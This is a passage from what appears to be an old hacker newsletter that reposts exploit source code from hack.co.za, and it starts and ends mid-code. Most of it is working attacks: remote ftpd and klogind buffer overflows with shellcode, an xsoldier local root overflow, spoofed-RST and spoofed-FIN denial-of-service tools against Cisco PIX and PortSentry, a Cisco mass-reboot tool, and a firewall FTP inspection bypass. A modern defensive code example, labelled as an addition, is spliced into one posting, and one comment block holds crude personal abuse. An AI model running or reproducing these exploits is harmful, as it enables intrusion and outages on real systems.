crashme, 500); return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in))); } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } void main (argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s, i; if (argc != 3) errs ("Usage: %s \n", argv[0]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(saddr = lookup (argv[1]))) err ("Unable to lookup source address.\n"); if (!(daddr = lookup (argv[2]))) err ("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_port = 9; sin.sin_addr.s_addr = 
daddr; if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1) { perror ("sendpkt_udp"); err ("Error sending the UDP packet.\n"); } } /* www.hack.co.za [20 May]*/ @HWA 246.0 [IND] ftp-ozone.c cisco remote bug by dug song. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ dugsong@monkey.org /* ftp-ozone.c Demonstrate a basic layer violation in "stateful" firewall inspection of application data (within IP packets - @#$@#$!): http://www.checkpoint.com/techsupport/alerts/pasvftp.html Dug Song Affected: Checkpoint Software Firewall-1 4.0 Checkpoint Software Firewall-1 3.0 Cisco PIX Firewall 5.1 Cisco PIX Firewall 5.0 Cisco PIX Firewall 4.4(4) Cisco PIX Firewall 4.3 Cisco PIX Firewall 4.2.2 Cisco PIX Firewall 4.2.1 Cisco PIX Firewall 4.1.6b Cisco PIX Firewall 4.1.6 */ #include #include #include #include #include #include #include #include #include #include #include #include #define PAD_LEN 128 /* XXX - anything on BSD, but Linux is weird */ #define GREEN "\033[0m\033[01m\033[32m" #define OFF "\033[0m" jmp_buf env_buf; void usage(void) { fprintf(stderr, "Usage: ftp-ozone [-w win] \n"); exit(1); } u_long resolve_host(char *host) { u_long addr; struct hostent *hp; if (host == NULL) return (0); if ((addr = inet_addr(host)) == -1) { if ((hp = gethostbyname(host)) == NULL) return (0); memcpy((char *)&addr, hp->h_addr, sizeof(addr)); } return (addr); } #define UC(b) (((int)b)&0xff) int ftp_pasv_reply(char *buf, int size, u_long ip, u_short port) { char *p, *q; port = htons(port); p = (char *)&ip; q = (char *)&port; return (snprintf(buf, size, "227 (%d,%d,%d,%d,%d,%d)\r\n", UC(p[0]), UC(p[1]), UC(p[2]), UC(p[3]), UC(q[0]), UC(q[1]))); } void handle_timeout(int sig) { alarm(0); longjmp(env_buf, 1); } void read_server_loop(int fd, int timeout, int pretty) { char buf[2048]; int rlen; if (!setjmp(env_buf)) { signal(SIGALRM, handle_timeout); alarm(timeout); for (;;) { if ((rlen = read(fd, buf, sizeof(buf))) == -1) break; if (pretty) { buf[rlen] = 
'\0'; if (strncmp(buf, "227 ", 4) == 0) printf("[" GREEN "%s" OFF "]\n", buf); else printf("[%s]\n", buf); } else write(0, buf, rlen); } alarm(0); } } int main(int argc, char *argv[]) { int c, fd, win, len; u_long dst; u_short dport; struct sockaddr_in sin; char buf[1024]; win = PAD_LEN; while ((c = getopt(argc, argv, "w:h?")) != -1) { switch (c) { case 'w': if ((win = atoi(optarg)) == 0) usage(); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 2) usage(); if ((dst = resolve_host(argv[0])) == 0) usage(); if ((dport = atoi(argv[1])) == 0) usage(); /* Connect to FTP server. */ memset(&sin, 0, sizeof(sin)); sin.sin_addr.s_addr = dst; sin.sin_family = AF_INET; sin.sin_port = htons(21); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &win, sizeof(win)) == -1) { perror("setsockopt"); exit(1); } if (connect(fd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connect"); exit(1); } read_server_loop(fd, 10, 0); /* Send padding. */ len = win - 5; /* XXX - "500 '" */ memset(buf, '.', len); if (write(fd, buf, len) != len) { perror("write"); exit(1); } /* Send faked reply. */ len = ftp_pasv_reply(buf, sizeof(buf), dst, dport); if (write(fd, buf, len) != len) { perror("write"); exit(1); } read_server_loop(fd, 5, 1); printf("[ now try connecting to %s %d ]\n", argv[0], dport); for (;;) { ; } /* NOTREACHED */ exit(0); } /* w00w00. */ /* www.hack.co.za [20 May]*/ @HWA 247.0 [IND] reset_state.c cisco remote dos attack by vortexia. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ andrew@cnsec.co.za /* reset_state.c (c) 2000 Citec Network Securities */ /* The code following below is copyright Citec Network Securities */ /* Code was developed for testing, and is written to compile under */ /* FreeBSD */ /* Hi All, just a bit of a security notification. 
Cisco has been informed of this problem and I'm waiting for a fix for the problem. I've also noted that various other firewalls are affected by this code, though if you wanna know if whatever you are running is affected, you will have to test it.

A brief rundown of the problem. If you run routable IPs on your internal interface on your PIX, and routable IPs on your external interface, so the PIX is not running NAT, the PIX keeps a state table of everything going on. Anything that is not in your state table that attempts to come in from the outside is denied, even if there is a conduit in place to permit anything. Which means that you have to establish a connection from your internal network to your external network before anything external can send data back. This is a really nice feature; unfortunately there is a bit of a bug that I found in this.

While testing on in-house equipment for possible flaws, as we continually test various products, I found the following. On receiving a RST packet (TCP Reset) from a given host with the correct source and destination port, the PIX will drop the state entry for that particular connection, which means the TCP connection dies due to the fact that, with no state entry, the external box can no longer talk to the internal box.

So, if we take a standard raw IP packet, give it a TCP header, and set the source IP as a machine that your internal box is connected to, and the destination IP as your internal machine, set the source port on the spoofed IP as the port the person is connected to, set your destination port on your destination IP cyclically to possible source ports on his side, and send resets, it will drop the person's state table entry, cutting him off from the box he is connected to.
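The state-table behaviour described above, as an added example that is not part of the original posting or of reset_state.c: a tracker that drops an entry on any RST matching the address/port tuple, beside one that also checks the RST's sequence number against the tracked receive window. The second follows the rule RFC 5961 gives for TCP endpoints, applied to a connection tracker as an assumption; all names and the sample flow are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

// Added illustration with hypothetical names. It models one direction of a
// tracked TCP flow and is not any vendor's implementation.
enum rst_verdict {
    RST_NO_STATE,   // no matching entry, nothing to do
    RST_IGNORED,    // sequence number outside the window: discard
    RST_CHALLENGE,  // in window but not exact: keep state, let the peer confirm
    RST_TEARDOWN    // state entry removed
};

struct flow {
    bool in_use;
    uint32_t src_ip, dst_ip;      // sender -> receiver of the tracked direction
    uint16_t src_port, dst_port;
    uint32_t rcv_nxt;             // next sequence number expected from src
    uint32_t rcv_wnd;             // window currently advertised by dst
};

struct rst_pkt {
    uint32_t src_ip, dst_ip;
    uint16_t src_port, dst_port;
    uint32_t seq;
};

#define MAX_FLOWS 32
struct state_table { struct flow flows[MAX_FLOWS]; };

void table_init(struct state_table *t)
{
    for (size_t i = 0; i < MAX_FLOWS; i++) t->flows[i].in_use = false;
}

// Returns 0 on success, -1 if the table is full.
int add_flow(struct state_table *t, struct flow f)
{
    for (size_t i = 0; i < MAX_FLOWS; i++) {
        if (!t->flows[i].in_use) {
            f.in_use = true;
            t->flows[i] = f;
            return 0;
        }
    }
    return -1;
}

int live_flows(const struct state_table *t)
{
    int n = 0;
    for (size_t i = 0; i < MAX_FLOWS; i++) n += t->flows[i].in_use ? 1 : 0;
    return n;
}

static struct flow *lookup(struct state_table *t, const struct rst_pkt *p)
{
    for (size_t i = 0; i < MAX_FLOWS; i++) {
        struct flow *f = &t->flows[i];
        if (f->in_use && f->src_ip == p->src_ip && f->dst_ip == p->dst_ip &&
            f->src_port == p->src_port && f->dst_port == p->dst_port)
            return f;
    }
    return NULL;
}

// Sequence space is modulo 2^32: true if seq lies in [start, start + len).
static bool seq_in_window(uint32_t seq, uint32_t start, uint32_t len)
{
    return (uint32_t)(seq - start) < len;
}

// Behaviour the posting describes: the tuple alone decides.
enum rst_verdict rst_tuple_only(struct state_table *t, const struct rst_pkt *p)
{
    struct flow *f = lookup(t, p);
    if (!f) return RST_NO_STATE;
    f->in_use = false;
    return RST_TEARDOWN;
}

// Hardened variant: tear down only on an exact sequence match.
enum rst_verdict rst_seq_checked(struct state_table *t, const struct rst_pkt *p)
{
    struct flow *f = lookup(t, p);
    if (!f) return RST_NO_STATE;
    if (p->seq == f->rcv_nxt) { f->in_use = false; return RST_TEARDOWN; }
    if (seq_in_window(p->seq, f->rcv_nxt, f->rcv_wnd)) return RST_CHALLENGE;
    return RST_IGNORED;
}

int main(void)
{
    // Constructed sample flow using documentation address ranges.
    struct state_table t;
    struct flow f = { .src_ip = 0xC6336407u, .dst_ip = 0xCB007105u,
                      .src_port = 23, .dst_port = 1025,
                      .rcv_nxt = 0xFFFFFFF0u, .rcv_wnd = 0x40u };
    struct rst_pkt blind = { f.src_ip, f.dst_ip, 23, 1025, 0x12345678u };

    table_init(&t);
    add_flow(&t, f);
    printf("checked:    verdict=%d live=%d\n", rst_seq_checked(&t, &blind), live_flows(&t));
    printf("tuple only: verdict=%d live=%d\n", rst_tuple_only(&t, &blind), live_flows(&t));
    return 0;
}
```

With the sequence check in place, a reset that only matches the address/port tuple leaves the entry intact, so cycling through ports alone no longer removes state.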
Now, the one question I asked when I wrote this, is why does this work, why is there no seq/ack checking on RST packets, this was answered in the TCP RFC, saying that seq/ack numbers are not checked on RST packets, however they are checked on FIN packets, hence using FIN packets for this test is futile without sequence prediction code.

There is a simple work around for this problem however, and anyone wishing to know the details of that is free to email me at andrew@cnsec.co.za for details.

Below I have posted example code to show the exploit and how it works, and hopefully this will be useful to someone on this list and help fix a fairly nasty denial of service problem.

Many Thanks

Andrew Alston
Citec Network Securities (Director)
Phone: (011) 787 4241
Fax: (011) 787 4259
Email: andrew@cnsec.co.za
*/

#define __BSD_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct slist {
    struct in_addr spoof;
    struct slist *link;
};                                  /* Spoof list */

int main(int argc, char *argv[])
{
    int i, int2;
    int sock;                       /* Socket stuff */
    int on = 1;                     /* Socket stuff */
    struct sockaddr_in sockstruct;  /* Socket stuff */
    struct ip *iphead;              /* IP Header pointer */
    struct tcphdr *tcphead;         /* TCP Header pointer */
    char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)];
                                    /* Our reset packet */
    int seq, ack;                   /* Sequence and Acknowledgement #'s */
    FILE *spooffile;                /* Spoof file */
    char *buffer;                   /* Spoof file read buffer */
    struct slist *scur, *sfirst;    /* Spoof linked list pointers */
    char src[20], dst[20];          /* Work around for inet_ntoa static */
                                    /* Pointers when using printf() */
    int sourcefrom, sourceto, destfrom, destto; /* CMD Line ports */
    int target;                     /* Target address from inet_addr() */

    if(argc < 6) {
        fprintf(stderr, "Usage: %s spoof_file target sps spe dps dpe\n"
                "target = your victim\n"
                "sps = Source port start\n"
                "spe = Source port end\n"
                "dps = Destination port start\n"
                "dpe = Destination port end\n",
argv[0]); exit(-1); } else { sourcefrom = atoi(argv[3]); sourceto = atoi(argv[4]); destfrom = atoi(argv[5]); destto = atoi(argv[6]); }; if(sourcefrom > sourceto) { printf("Error, start source port must be less than end source port\n"); exit(-1); } else if(destfrom > destto) { printf("Error, start dest port must be less than end dest port\n"); exit(-1); }; printf("Used spoof file %s\n" "Destination: [%s] ports: [%d -> %d]\n" "Target source ports: [%d -> %d]\n", argv[1], argv[2], destfrom, destto, sourcefrom, sourceto); sleep(1); bzero(evilpacket, sizeof(evilpacket)); /* Clean our reset packet */ sfirst = malloc(sizeof(struct slist)); scur = sfirst; scur->link = NULL; /* Setup our spoof linked list */ if(!(buffer = malloc(25))) { perror("malloc"); exit(-1); }; /* Allocate for read buffer */ if ((spooffile = fopen((char *) argv[1], "r")) <= 0) { perror("fopen"); exit(-1); /* Open our spoof file */ } else { while (fgets(buffer, 25, spooffile)) { /* Read till EOF */ if (!(inet_aton(buffer, &(scur->spoof)))) printf("Invalid address found in victim file.. 
ignoring\n"); else { scur->link = malloc(sizeof(struct slist)); scur = scur->link; scur->link = NULL; /* Cycle l.list */ } }; /* End of while loop */ }; /* End of if {} else {} */ free(buffer); /* Free up our read buffer */ fclose(spooffile); /* Close our spoof file */ scur = sfirst; /* Set spoof list current to first */ if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } /* Allocate our raw socket */ if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } /* Set socket options for raw iphead */ sockstruct.sin_family = AF_INET; iphead = (struct ip *) evilpacket; tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip)); /* Align ip and tcp headers */ iphead->ip_hl = 5; /* Ip header length is 5 */ iphead->ip_v = 4; /* ipv4 */ iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); /* Length of our total packet */ iphead->ip_id = htons(getpid()); /* Packet ID == PID # */ iphead->ip_ttl = 255; /* Time to live == 255 */ iphead->ip_p = IPPROTO_TCP; /* TCP Packet */ iphead->ip_sum = 0; /* No checksum */ iphead->ip_tos = 0; /* 0 Type of Service */ iphead->ip_off = 0; /* Offset is 0 */ tcphead->th_win = htons(512); /* TCP Window is 512 */ tcphead->th_flags = TH_RST; /* Reset packet */ tcphead->th_off = 0x50; /* TCP Offset 0x50 */ iphead->ip_dst.s_addr = inet_addr(argv[2]); srand(getpid()); /* Seed for rand() */ while (scur->link != NULL) { seq = rand() % time(NULL); /* Randomize our #'s */ ack = rand() % time(NULL); /* Randomize ack #'s */ sockstruct.sin_port = htons(rand() % time(NULL)); iphead->ip_src = scur->spoof; /* Set the spoofed address */ sockstruct.sin_addr = scur->spoof; for(i = sourcefrom; i <= sourceto; i++) { for(int2 = destfrom; int2 <= destto; int2++) { usleep(2); /* Sleep 5ms between packets */ seq += (rand() %10)+250; ack += (rand() %10)+250; tcphead->th_seq = htonl(seq); /* Set sequence number */ tcphead->th_ack = htonl(ack); /* Set ack number */ 
tcphead->th_dport = htons(int2); /* Set destination port */ tcphead->th_sport = htons(i); /* Set source port */ snprintf(src, 20, "%s", inet_ntoa(iphead->ip_src)); snprintf(dst, 20, "%s", inet_ntoa(iphead->ip_dst)); /* Copy info to src and dst for printing */ printf("TCP RESET: [%s:%d] -> [%s:%d]\n", src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport)); sendto(sock, &evilpacket, sizeof(evilpacket), 0x0, (struct sockaddr *) & sockstruct, sizeof(sockstruct)); /* Send our evil packet */ }; }; scur = scur->link; /* Cycle the spoof ips */ } scur = sfirst; return (1); }; /* www.hack.co.za [20 May]*/ @HWA 248.0 [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ teddi@linux.is /* * FTP server (Version 6.2/OpenBSD/Linux-0.10) and 6.3 ?? * getwd() overflow. linux exploit, remote penetration. * * author: DiGiT - teddi@linux.is * * greets: p0rtal && \x90 & me for discovering this bug. * big thx to duke for ADMwuftp. * #hax, #!ADM * Run like: (./ftpexp 0 dir ; cat) | nc victim.com 21 * offset vary from -500 - +500 * PRIVATE EXPLOIT$#%#%#$ */ #include #include // need to find for other, tested of slack 3.6. 
// #define RET 0xbfffec5c #define RET 0xbfffeb30 #define USERNAME "ftp" #define PASSWORD "lamer@" char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\x90\x90\x31\xc0\x31\xdb\xb0\x17" "\xcd\x80\x31\xc0\xb0\x17\xcd\x80" "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0" "\x27\x8d\x5e\x05\xfe\xc5\xb1\xed" "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0" "\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1" "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10" "\x56\x01\xce\x89\x1e\x83\xc6\x03" "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10" "\xcd\x80\x31\xc0\x88\x46\x07\x89" "\x76\x08\x89\x46\x0c\xb0\x0b\x89" "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd" "\x80\xe8\xac\xff\xff\xff"; void mkd(char *dir) { char blah[1024], *p; int n; bzero(blah, sizeof(blah)); p = blah; for(n=0; n 1) offset = atoi(argv[1]); else offset = 0; fprintf(stderr, "ret-addr = 0x%x\n", RET + offset); fprintf(stderr, "shell size = %d\n", sizeof(shellcode)); dir2[231] = '\0'; memset(dir2, '\x90', 230); printf("user %s\r\n", USERNAME); printf("pass %s\r\n", PASSWORD); printf("cwd %s\r\n", argv[2]); memset(buf1, 0x90, 600); p = &buf1[sizeof(argv[2])]; q = &buf1[599]; *q = '\x00'; while(p <= q) { strncpy(tmp, p, 100); mkd(tmp); p+=100; } mkd(dir2); mkd(shellcode); mkd("bin"); mkd("sh"); memset(buf2, 0x90, 100); // var 96 for(i=4; i<96; i+=4) *(long *)&buf2[i] = RET + offset; p = &buf2[0]; q = &buf2[99]; strncpy(tmp, p, 100); mkd(tmp); printf("pwd\r\n"); } /* www.hack.co.za [20 May]*/ @HWA 249.0 [IND] killsentry.c linux/misc remote port sentry killer by vortexia. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ andrew@cnsec.co.za /* killsentry.c (c) 1999 Vortexia / Andrew Alston Excuse the crappy coding, this code was written when I was very bored, had nothing better to do, and felt like proving the point that automatic firewalling is a bad idea. The code spoofs FIN packets from sequential internet hosts, starting at 1.0.0.0 and going right through to 255.255.255.255, sending 15 packets from each, one packet each to port 100 to 115. 
Feel free to modify this code, if you use the code for anything, please give me credit where it is due. I hold no responsibility for anything this code is used for, I give no guarantees that this code works, and I hold no responsibility for anything this code does to any system you run it on. If you screw up with it, its your problem, not mine. The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know about any other platforms or systems. Greets and shoutouts: Wyze1 - Thanks for the moral support, here is something you may use in Forbidden Knowledge Sniper - My partner in crime, you rock Timewiz - What can I say, thanks for ideas for projects still coming Moe1 - For all the information Ive had from you - Its appreciated Uglykidjoe - For things said and done - I owe you Hotmetal - A general greet Bretton Vine - Dont worry the underground you hate so much still loves you Everyone else in #hack on irc.electrocity.com - You guys rock Curses, fuckoffs, and the like - Logik - Get a clue, skript kiddie life aint the way Gaspode - I dont think I even need this - a major FUCK YOU and I hope you get castrated with a rusty spoon - take your god like attitude and shove it up your ass Sunflower - May you fall pregnant to one of the many ircops you screw Anyone else that I dislike but cant think of right now - FUCK YOU Anyone who dislikes me - FUCK YOU */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define TARGETHOST "YOURTARGETHERE" int main() { int octet1, octet2, octet3, octet4; int i; int sock; int on = 1; struct sockaddr_in sockstruct; struct ip *iphead; struct tcphdr *tcphead; char ipkill[20]; char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; struct in_addr spoof, target; int seq, ack; bzero(&evilpacket, sizeof(evilpacket)); // Very bad way to generate sequence numbers srand(getpid()); seq = rand()%time(NULL); ack = rand()%time(NULL); 
target.s_addr=inet_addr(TARGETHOST); if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } sockstruct.sin_family = AF_INET; iphead = (struct ip *)evilpacket; tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip)); iphead->ip_hl = 5; iphead->ip_v = 4; iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); iphead->ip_id = htons(getpid()); iphead->ip_ttl = 255; iphead->ip_p = IPPROTO_TCP; iphead->ip_dst = target; iphead->ip_sum = 0; iphead->ip_tos = 0; iphead->ip_off = 0; tcphead->th_sport = htons(80); tcphead->th_seq = htonl(seq); tcphead->th_ack = htonl(ack); tcphead->th_win = htons(512); tcphead->th_flags = TH_FIN; tcphead->th_off = 0x50; for(octet1 = 1; octet1 <= 255; octet1++) for(octet2 = 0; octet2 <= 255; octet2++) for(octet3 = 0; octet3 <= 255; octet3++) for(octet4 = 0; octet4 <= 255; octet4++) { bzero(ipkill, 20); sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4); for(i = 100; i <= 115; i++) { tcphead->th_dport = htons(i); sockstruct.sin_port = htons(i); spoof.s_addr = inet_addr(ipkill); iphead->ip_src = spoof; sockstruct.sin_addr = spoof; sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct sockaddr *)&sockstruct, sizeof(sockstruct)); } } return(1); }; /* www.hack.co.za [20 May]*/ @HWA 249.0 [IND] cisconuke.c cisco http mass dos tool. ;)) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/cisco/cisconuke.c NOTE: Distributed by hack.co.za don't complain to me! - Ed /* - PRIVATE Do NOT distribute PRIVATE - Cisco IOS deficiency (web-server interface) allows an arbitrary router to be rebooted. 1. Create an IP address list (or hostnames). 2. gcc -o cisconuke cisconuke.c 3. ./cisconuke ip-address-list 4. If the target's a Cisco with open TCP/80, it goez b00m. 
We use a timeout because, in the event that a host resolves but is down, waiting for ETIMEDOUT would slow your DOSing down. Adjust if necessary (slow links etc). Comment out the VERBOSE #define if you don't want to see what's happening. */ #define VERBOSE #define TIMEOUT 10 #include #include #include #include #include #include #include #include #include #include #include #include sigjmp_buf env; u_long resolve_host(u_char *host) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host)) == -1) { host_ent = gethostbyname(host); if (!host_ent) return((u_long)0); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } void net_timeout(void) { alarm(0); siglongjmp(env, 1); } int nuke_cisco(u_long dst_ip) { struct sockaddr_in sin; u_char crash[] = "GET /\%\%\n\n"; int sock; alarm (0); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = dst_ip; if (sigsetjmp(env, 1)) { /* Timeout. */ close(sock); return(-1); } alarm(TIMEOUT); signal(SIGALRM, (void *)net_timeout); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { close(sock); return(-1); } alarm (0); if (write(sock, crash, strlen(crash)) != strlen(crash)) { close(sock); fprintf(stderr, "\nWarning: truncated write()\n"); return(-1); } close(sock); return(0); } int main(int argc, char **argv) { FILE *filez; struct in_addr addr; u_long dst_ip = 0; u_char host[255] = {0}; int nuked = 0, notnuked = 0; if (argc != 2) { fprintf(stderr, "\nusage:\t%s ip_list\n\n", argv[0]); exit(-1); } filez = fopen(argv[1], "r"); if (!filez) { fprintf(stderr, "Can't open IP address list file.\n"); exit(-1); } while (fgets(host, sizeof(host) - 1, filez) > 0) { host[strlen(host) - 1] = 0; host[strlen(host) ] = 0; dst_ip = resolve_host(host); if (dst_ip) { #ifdef VERBOSE addr.s_addr = dst_ip; fprintf(stderr, "Resolved host `%s`, killing.. 
", inet_ntoa(addr)); #endif /* VERBOSE */ if (!nuke_cisco(dst_ip)) { #ifdef VERBOSE fprintf(stderr, "success.\n"); nuked++; #endif /* VERBOSE */ } else { #ifdef VERBOSE fprintf(stderr, "can't connect to TCP/80\n"); notnuked++; #endif /* VERBOSE */ } } else { #ifdef VERBOSE fprintf(stderr, "Can't resolve %s\n", host); notnuked++; #endif /* VERBOSE */ } memset(host, 0, sizeof(host)); } fprintf(stderr, "\nCompleted run:\n" "Obtained a successful connection and sent crash: %d hosts.\n" "No connection to port 80 or cannot resolve: %d hosts.\n\n", nuked, notnuked); exit(0); } /* EOF */ /* www.hack.co.za [19 May]*/ @HWA 250.0 [IND] xsol-x.c mandrake 7.0 local overflow by lwc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ lwc@vapid.dhs.org /*Larry W. Cashdollar linux xsolider exploit. *lwc@vapid.dhs.org http://vapid.dhs.org *if xsolider is built and installed from its source it will be installed *setuid root in /usr/local/games *original exploit found by brock tellier for freebsd 3.3 ports packages. *If a setregid() call is placed in the shellcode, you can get egid=12 *with the default mandrake installation.*/ #include #include #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 4480 /*our buffersize. 
*/ char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */ "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i, offset; long retaddr = get_sp (); if (argc <= 1) offset = 0; else offset = atoi (argv[1]); /*#Copy the NOPs in to the buffer leaving space for shellcode and #pointers*/ for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP; /*[NNNNNNNNNNNNNNNNNNNNN ]*/ /* ^-- LEN -(strlen(shellcode)) - 35*/ /*#Copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/ /* ^-(buffer+i) */ /*#Fill the buffer with our new address to jump to esp + offset */ for (i = i + strlen (shellcode); i < LEN; i += 4) *(long *) &buffer[i] = retaddr+offset; /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/ /* ^-(i+strlen(shellcode))*/ printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN); execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0); } /* www.hack.co.za [19 May]*/ @HWA 251.0 [IND] klogind.c bsdi 4.0.1 remote overflow by duke. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ duke@viper.net.au /* klogin remote buffer overflow by duke (duke@viper.net.au) tested on BSDI 4.0.1 klogin. The bug is actually in the kerberos library so this affects all kerb services (kerbIV). 
This code should need minimal (if any) modification to use on other kerberos services. it will only work if the file /etc/kerberosIV/krb.conf exists. -duke */ #include #include #include #include #include #include #include #include #include #define RET 0x8047830 #define NOPLEN 900 #define MAX(x, y) ((x > y) ? x : y) char bsdi_shell[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; void usage(char *); void shell(int); char *make_data(void); int offset=0; int main(int argc, char **argv) { int sockfd, port=543, c; char *pkt, buf[1024]; struct sockaddr_in sin; struct hostent *hp; while((c = getopt(argc, argv, "p:o:")) != EOF){ switch(c){ case 'p': port = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); } } if(!argv[optind]) usage(argv[0]); if((hp = gethostbyname(argv[optind])) == NULL){ fprintf(stderr, "can't resolve host\n"); exit(-1); } pkt = make_data(); bzero(&sin, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr = *((struct in_addr *)hp->h_addr_list[0]); if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(-1); } if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0){ perror("connect"); exit(-1); } write(sockfd, pkt, 1221); free(pkt); shell(sockfd); } void usage(char *p) { fprintf(stderr, "usage: %s [ -p port ] [ -o offset ] \n", p); fprintf(stderr, "-p: port to use\n"); fprintf(stderr, "-o: offset\n"); exit(0); } char *make_data(void) { char *tmp, *ptr; int i; if((tmp=(char *)calloc(1250, sizeof(char))) == NULL){ perror("calloc"); exit(-1); } ptr = tmp; *ptr++ = 0x00; memcpy(ptr, "AUTHV0.1", 8); ptr+=8; for(i=0; i<8; i++) *ptr++ = 0x41; *(unsigned long *)ptr = htonl(1200); ptr+=4; *(unsigned int *)ptr++ = 4; *ptr++ = 8; *ptr++ = 1; for(i=0; i < 600; i+=4) *(long *)&ptr[i] = RET + offset; memset(ptr+300, 0x90, NOPLEN); memcpy(ptr+800, bsdi_shell, 
